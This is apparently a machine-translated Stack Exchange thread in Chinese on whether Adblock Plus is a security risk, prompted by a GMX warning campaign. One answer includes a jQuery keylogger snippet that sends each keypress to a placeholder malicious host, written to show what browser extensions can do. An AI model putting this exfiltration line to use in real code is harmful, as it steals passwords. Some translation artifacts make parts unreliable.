我的电子邮件提供商的网站(http://www.gmx.de)最近开始链接到(德国)网站http://www.browsersicherheit.info/,该网站基本上声称,由于其具有修改网站外观的功能,Adblock Plus(及其他网站)实际上可能被滥用来进行网上诱骗。这是该网站的引文及其翻译:



Solche附加组件浏览器和应用程序的发行版均由Dritte weitergeben发行–由Ihr Bank-Passwort提供。 Dies kann auf allen Web-Seiten passieren。通过SSL实现安全机制。


翻译为:


这样的插件可以访问您浏览器的所有输入,也可以将其转发给第三方-甚至您的银行密码。这可以在所有网站上发生。像SSL这样的安全机制无法避免这种情况。


好吧,他们提到了其他(显然是垃圾软件)插件,但是Adblock Plus确实是一种安全威胁,还是该网站的运营商只是利用这个机会试图吓in没有经验的用户再次查看他们的广告?

评论

归结为:不要运行任何您不信任的应用程序。如果Adblock是邪恶的,它可能会窃取您的登录数据。如果您运行的任何其他可执行文件都是邪恶的,那么也可以这样做。

只是为了幽默:您为什么不使用Ghostery? ;-)

你能澄清这个问题吗?您是在问像Adblock这样的Addons从理论上讲可能会构成安全风险,还是在问Adblock当前是否存在安全风险?

我想知道有多少用户在阅读了有关此的所有文章后开始使用Adblock Plus吗?一些实体在发起勒索活动之前应该真正考虑Streisand效应。

@JeffMercado那么,Chrome的网上商店不是一个严重的问题吗?我不记得Mozilla发生过这样的BS ...

#1 楼

它不是。这是GMX的FUD(恐惧,不确定性和疑问)广告系列,因为他们希望展示其广告。提及的广告拦截器绝对没有安全风险。他们在列表中添加了一些垃圾软件,以使其看起来更加合法。

当然,这样的活动非常罕见,尤其是来自像GMX这样的知名大公司。不幸的是,我手头没有英文资料来源(因为这是德语活动),但是由于您会说德语,因此您可能想在heise.de阅读这篇文章。

更新#1:联合国互联网, GMX背后的一家公司,因误导客户PC上存在安全风险而误导客户而受到了很多批评。 《华尔街日报》(德语版)将GMX上显示的警告及其链接的网站命名为“恐吓运动”。

更新#2:GMX现在表示,当出现以下警告时,它们将不再显示链接您使用了广告拦截器,但如果您使用注入广告的垃圾软件仍然会显示它,则网站http://www.browsersicherheit.info/上的列表已相应更新,现在仅列出了一小部分垃圾软件。该列表绝不是完整的,因此当您想知道浏览器是否安装了垃圾软件时,它不是可靠的来源。但是,United Internet仍然保持其立场,即他们不希望访问其网站的用户使用广告拦截器,并表示他们将来会开发其他反拦截方法(德语来源)。

评论


您更信任谁? ABP(一直受到严格审查,如果用其他东西代替mybank.com会被热轧)还是某些德国随机公司?可以将插件用于邪恶目的吗?当然...但是没有证据证明这只是盲目的指控和FUD。

–WernerCD
2014-2-27 14:54

@WernerCD GMX是主要的电子邮件提供商,是顶级非Gmail提供商之一。这不是“一些随机的德国公司”。而且,在所有国家/地区中,德国公司是您决定不信任的公司吗?

–最佳
2014年2月27日19:29在

@Superbest GMX和其他德国电子邮件提供商还开展了“德国制造的电子邮件”活动,在该活动中,他们误导客户以为通过其邮件服务器发送的邮件可以免受监视。

–安达卢尔
2014年2月27日19:33

@Superbest好...如果不是美国公司,那么它是其他一些随机公司。 .....我开玩笑。但是说真的,对于大多数公司,我都会说同样的话-如果Comcast或Google告诉我停止使用ABP,我也会说同样的话。当一家从广告中获利的公司告诉您停止使用广告拦截器时,您必须大惊小怪。

–WernerCD
2014年2月27日在19:54



说没有风险真是不诚实。但是,风险很小,我同意这不过是FUD运动而已。

– josh3736
2014-2-27在20:23

#2 楼

更新

经过深思熟虑,我必须同意其他答案,尽管事实上,它可以访问您的数据,但Adblock更有可能保护您的隐私而不是入侵。真正的风险是恶意广告,它们会提示您在计算机上安装软件。 Adblock可以防止这些情况。

下面是原始的警告提示:

是的,完全是。

Adblock Plus是浏览器扩展/添加-由独立开发商开发。 Adblock可以访问所有页面上的DOM(文档对象模型)。

AdBlock的工作方式是将脚本注入浏览器,该浏览器搜索DOM,然后根据确定的内容运行hide()函数是广告。

这意味着AdBlock(以及具有该权限的任何Chrome扩展程序)都可以访问您的DOM。 Adblock无法访问JavaScript变量。

这是什么意思?

如果您正在使用安全身份验证的网站上,并且有一个JavaScript对象带有诸如AuthKey之类的私有内容,你很安全。 AdBlock无法访问JavaScript变量。

但是,AdBlock可以运行与此等效的代码。

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

本质上,这会将您按下的任何键路由到远程服务器。

它可以用来窃取密码,甚至比窃取令牌还差。

有人说,AdBlock本身有危险吗?

在我看来,AdBlock并没有太危险,因为开发人员已经确定了自己的身份,并且被数百万人使用。如果它执行上述操作时很棘手,则可能会注意到并吹哨。

但不要认为Chrome Extensions绝对安全。他们所有人都可以窃取任何数据以及其他恶意内容。

它还能做什么?

Chrome扩展程序还可以非常轻松地执行以下安全违规行为...


将您阅读的任何电子邮件或页面的内容路由到第三方来源(如果该电子邮件包含未加密的登录信息,则您很烦)。如果您可以在屏幕上看到它,那么任何Chrome扩展程序也可以在屏幕上看到它们,没有问题。
在字段中输入信息,然后按提交按钮,例如,发送电子邮件
如果您保持浏览器打开,并且扩展知道如何进行扩展,则可以使用您的电子邮件界面(Gmail,Outlook)来将选择的电子邮件发送给您的联系人。这很简单。
更改与任何按钮关联的脚本(如果该按钮最初是与jQuery一起放置的)。例如,可以稍微更改将登录信息发送到服务器的按钮,以将信息发送到服务器和http://mymaliciousserver。这是微不足道的。

更新

通过讨论已证实AdBlock是开源的。这会让您更加信任AdBlock,但请记住,AdBlock仍然可以执行这些操作。我检查了源代码,可以肯定地说我根本不知道发生了什么。

源:我是JavaScript和Chrome扩展程序开发人员。

评论


如果它是Chrome扩展程序,并且允许它访问所有页面上的数据,则它可以执行所有这些操作。几乎所有的Chrome扩展程序都要求获得此权限,并且如果考虑使用AdBlocker,则甚至需要它才能正常工作。

–耳语者
2014-2-27在21:09

@itcouldevenbeaboat adblockplus.org/en/contribute-code

– Tobias Kienzler
14年2月28日在7:01

@TobiasKienzer这太棒了。打扰一下,当我拨叉AdBlock并开始我的AdTeese项目时,该项目用Dita von Teese的大小固定的针脚代替了所有添加项。

–耳语者
2014年2月28日在14:22

如果您正在查看的源与扩展使用的源不同,则“开放源”没有任何意义。我已经发布了Chrome扩展程序源查看器,该查看器允许您查看扩展程序的真实源(=安装扩展程序时将要使用的一个)。当然,您必须相信扩展程序能够实现它所承诺的功能,即显示正确的源代码,而不是经过审查的源代码。归结为“仅安装您信任的发行商的软件”)。

– Rob W
14年2月28日在22:01

@TobiasKienzler似乎Firefox具有更严格的审阅过程,似乎更注重手动审阅。当然,它不是万无一失的(等待批准时更新时间更长),但可能比Chrome还要多-Google对他们的评论方式并不十分明确。

–鲍勃
2014年3月2日4:25



#3 楼

这实际上归结为信任问题。确实,今天,AdBlock扩展程序是安全的。我们知道,即使有其他答案指出,它也不会窃取您的数据,但它具有这样做的技术能力。

但是,Chrome扩展程序会以静默方式自动更新。

您是否相信AdBlock扩展程序的开发人员不会添加恶意代码?我个人这样做–拥有数百万的用户,恶意代码将很快被注意到,并且无疑会成为开发人员的职业杀手。

即使您确实信任开发人员,也仍然有不大可能的情况暴露出来您:


开发人员的Chrome应用商店帐户可能会遭到黑客入侵,攻击者可能会发布恶意更新。
开发人员可能会将扩展程序出售给不那么认真的一方。
有人可能会鼓励开发人员推送恶意代码。

对于偏执狂,可以通过以下方式缓解这些问题:


仅登录敏感站点(即银行)使用隐身模式(默认情况下,扩展名默认为禁用)。

禁用自动扩展名更新,但显然会失去很多便利。

因此,从理论上讲,这是不诚实的说“不,没有风险”,风险完全被GMX夸大了。就像我信任Google为我提供不会窃取我的个人数据的浏览器一样,我也信任AdBlock开发人员为我提供不会窃取我的数据的扩展程序。

扩展程序被更新的风险带有恶意代码的代码足够小,我根本就不用担心,如果我确实有丝毫担心,禁用扩展很容易。

评论


“相信Google给我一个浏览器”……在一个句子中使用了“ Google”和“ trust”这两个词,这一事实震惊了。

–鹿猎人
2014-2-28在4:39

确实有好处-当然,Firefox也是如此

– Tobias Kienzler
2014年2月28日在7:06

哈哈哈-我相信Google提供的浏览器可以窃取我的数据,但是至少我对它们将对我的数据进行的所有处理都具有合理的想法,而且我目前已经购买了该模型并相应地管理该数据集。

–Rory Alsop♦
2014年2月28日在9:12

嗯,浏览器本身不会窃取您的数据;当然,附带的服务是另外一回事了。请勿将浏览器登录到Google帐户,并取消选中“隐私”设置中的所有复选框(或使用“隐身”),也不会泄漏任何信息给Google。 Firefox和IE也是如此。

– josh3736
2014年2月28日在16:32

Chrome扩展程序的开发人员已经将自己的IP出售给了另一位没有相同道德规范,安全预防措施等的第三方。这并不是说AdBlock存在风险。它只是强调说,当您使用扩展程序时,您需要认识到情况可能会发生变化,并且您信任和确信的某些事情最终可能会演变成不值得信任的事情。

– Tim X
2014年12月11日在22:43

#4 楼

所有软件都有安全风险,但是在这种情况下,他们的主张具有误导性。

就像所有建议都可能是不良的,并且所有交易都可能是欺诈一样。 “风险”仅表示您的安全性得不到保证,在100%的情况下都是如此。

但是对于AdBlock Plus,该软件已得到很好的理解,并由拥有以下经验的团队开发保护用户利益的良好记录。加上它是开源的,因此源代码可供您检查任何安全问题。因此,在这种情况下,风险很小。相反,

,GM​​X却使用真实性(“软件总是有风险”)来暗示该软件是危险的,充其量是误导性的,甚至是诽谤性的。这就像餐馆老板分发传单,说他的竞争对手可能会毒化自己的食物。从技术上讲,这是真的,因为您说的是“可能”而不是“是”,但从根本上来说,这种行为是不诚实的。

评论


我只希望他们更加诚实,例如“请通过查看我们的广告来支持我们的服务。否则。”

– Tobias Kienzler
2014-2-28在7:07

#5 楼

仅观察一下-我倾向于推广广告拦截器,尤其是为我那些不太精明的朋友和同事促销-正是因为它减少了安全威胁。怎么样?因为网络上大多数最恶意的内容都是带有误导性广告的形式,例如“单击此处以使您的PC更快” ...这些在很大程度上被广告拦截器所掩盖。

评论


然后是“您似乎已感染病毒,请立即下载'anti'-virus”-有人单击此按钮的最佳原因:“单击'no'后它没有消失,所以我选择了'ok'” m- /

– Tobias Kienzler
2014-02-28 9:13



如果某个网站说“请不要在该网站上使用广告拦截器;它们会帮助我们付款,我们承诺不会将广告空间出售给任何恶意内容。”我不得不关闭该网站上的广告拦截器。

–苦艾酒
2014年2月28日在19:44

就是我在整个SE网络上所做的

– Tobias Kienzler
2014年1月1日9:17

我没有使用adblocker,因为我知道它可以帮助我访问大多数网站上的账单。我希望有一个部分的广告拦截器,它只能拦截已知是恶意的广告。对于那些不是恶意的引人入胜的广告(Flash,GIF,视频等),我也很满意,只是试图引起人们的注意,所以Adblock Plus较小的过滤器仍然不适合我。

–SztupY
2014年4月4日20:30

#6 楼

Adblock(和其他扩展程序一样,也就是浏览器开发人员)具有获取大量数据的技术能力,并且您通常会遇到与运行第三方应用程序有关的所有风险-即卖方可能是恶意的,而且他们的软件中可能存在一些漏洞,可能会破坏您的安全性。

话虽这么说,我认为AdBlock可以防御网络钓鱼。许多有问题的软件通过伪装成其他东西的广告被推送给用户-即,某个网站提供了用户想要的某些商品,但其广告看上去像一个下载按钮,并投放了一些广告软件/恶意软件产品,而不是实际的网站上的内容,以及此类“意外”下载的恶意软件会带来严重的安全风险。同样,通过运行包含零时差漏洞的广告横幅也发生了大规模的消费者攻击事件,这将导致该漏洞出现在受人尊敬的,值得信赖的网站上。

对于公司范围的安全实践,它要求AdBlock并默认在每个工作站上安装它可能是有意义的-因为它对于保护那些不会自己安装的经验不足的用户特别有用。如果再信任一个软件产品,则可能会带来风险,但对日常安全性却有正面的影响。

评论


有趣的一点是,尽管要在全公司范围内使用,但我会考虑使用仅在对更改进行足够彻底的审查后才更新的本地fork

– Tobias Kienzler
2014年2月28日在9:12

是的,值得信赖且经过验证的固定版本很棒-再次,这就像对待其他任何常用安装的软件及其升级一样,完全在处理adblock风险。

– Peteris
2014年2月28日在12:38

#7 楼

联合互联网传播这些信息的方式具有误导性(我正努力避免说“诽谤”)。目前的指控在所有客观手段上显然都是错误的,而且陈述是诽谤性的。

当然,原则上,人们必须承认Adblock(Plus)当然具有潜在的安全风险。此风险是否值得合理关注是另一回事。

Adblock(Plus)可能会带来安全风险,原因有以下三个:


它是在以下平台上运行的软件您的计算机,就像所有软件一样,原则上可以执行几乎所有操作。包括显示虚假信息或窃取您的数据。
确实会修改网页内容,这就是屏蔽广告所针对的内容。当然,众所周知,修改网页内容的软件可能会以恶意方式修改内容,并且比其他软件更容易被忽视。
它通过匹配可下载的正则表达式列表来执行此任务。一系列(不受控制/未知的)第三方,例如EasyList

因此,如果您处于超妄想模式,则您可能会担心,EasyList中的某个人(或其他过滤器列表提供者)会修改过滤列表,以便他们进行恶意操作,或者黑客劫持该网站。您的Adblock Plus插件可能会在每天/每周更新期间下载恶意列表,而无需知道并且没有验证方法(可以嵌入校验和,但这只能防止意外损坏,而不能恶意修改)。 >因此,从理论上讲,这样的恶意阻止列表可能会导致插件执行“邪恶的事情”。

幸运的是,除了JS漏洞利用之外,实际上并没有太多危害可以通过此攻击向量是由于Adblock的工作方式(它将匹配任意正则表达式,但不会进行任意怀疑,因此隐藏它不应该隐藏的某些元素或让某些广告通过几乎是最糟糕的情况)。 br />另一方面,可以在没有首先运行Adblock Plus的情况下对您使用JS漏洞。

此外,很显然,像任何第三方软件(包括Firefox或Chrome本身!)一样,Adblock Plus插件本身可能会窃取您的数据。您目前只能说的是,到目前为止还没有发生。
然后,几乎所有业务中的大型商业参与者每天都在做不可信的事情,没有人反对。
/>
现在,您必须问自己,Adblock Plus确实会窃取用户数据的可能性有多大,而在广泛部署的开放环境中,这种事情在一天或两天之内不会被发现的可能性有多大源项目。

坦率地说,如果您认为这是一个严重且现实的威胁,很可能会影响您,那么您还必须相信Microsoft与NSA合作已经在Windows和Windows Server 2003中建立了身份盗用功能。每台计算机都有一个秘密的“杀死开关”,美国国防部可以随意激活它(原则上也是可以的,而且比Adblock的作者窃取您的积蓄更可能是真的)。​​

在这种情况下,您也不应该信任GMX,因为它们会(以措辞,不会,也可能)以恶意和不道德的方式与其他方(至少与美国机构,由于施罗德(Schröder)于2001年签订了条约,但您无法与其他人分享信息。
您也不应该信任1&1(联合互联网的另一位成员),因为他们会与who-knows-whom(作为一家美国公司)。无论是Google还是互联网的另一半。

另一方面,Adblock Plus过去显然已阻止了恶意软件在用户计算机上的安装。

#8 楼

除信任之外,其他答案都忘记提及了该问题:该adblock会修改您访问的页面。这并不得不信任更多的开发人员,这就是为什么我从未使用过广告拦截软件/浏览器插件,并强烈建议不要这样做的原因。
众所周知,网站依赖各种易碎的变量来保证安全性。例如,仅查看过去解决点击劫持的方式。没有什么可以阻止adblock错误地违反该站点依赖于安全性的不变性。

adblock和其他广告阻止软件还可以减少匿名性。攻击者可以使您运行代码来浏览DOM树并查找丢失的部分/更改,或者被动地观察到您并未提出某些请求来获取与广告相关的内容(其中某些请求可能托管在网站本身上,使其成为可能的对手)。

评论


有多少人将Adblock *与EasyList一起使用,而没有其他过滤器?

–好奇
2014年3月2日,2:21

#9 楼

这里没有人提到的是,Adblock plus以及几乎所有其他浏览器和扩展程序都可以远程更新。这意味着,即使程序被锁定到特定的“可信任”更新URL,也必须存在后门。可以将其解释为间谍软件,但间谍软件是一个抽象术语。

的确,尽管Adblock plus已被广泛接受,但大多数人都说它不安全,因为它具有读取和发送数据的权限。特别是不是恶意的。尽管大多数情况下都是开源的(包括Adblock),但浏览器软件和扩展的安全性仅与更新URL一样安全,而对于这些URL,由于无法远程访问这些服务的代码,因此无法知道其实际安全性。

显然,由于熵和拥有用户的关系,没有软件或服务器可以100%安全,但是要获得最高的安全性,您应该研究源代码,始终从源代码构建并禁用自动更新。与所有软件一样,浏览器和扩展程序的安全性仅取决于用户对其进行的保护。

评论


“这里没有人提到,Adblock plus以及几乎所有其他浏览器和扩展都可以远程更新。”再读一次;这已经被提及。

–吕克
2014年5月17日上午10:02

哦,对不起,我的错。我认为是因为您的帖子比最初提到的帖子更接近底部(通常帖子按时间顺序排列非常粗略),但是我当然应该检查一下。我站得住了:)

–吕克
2014年5月17日23:31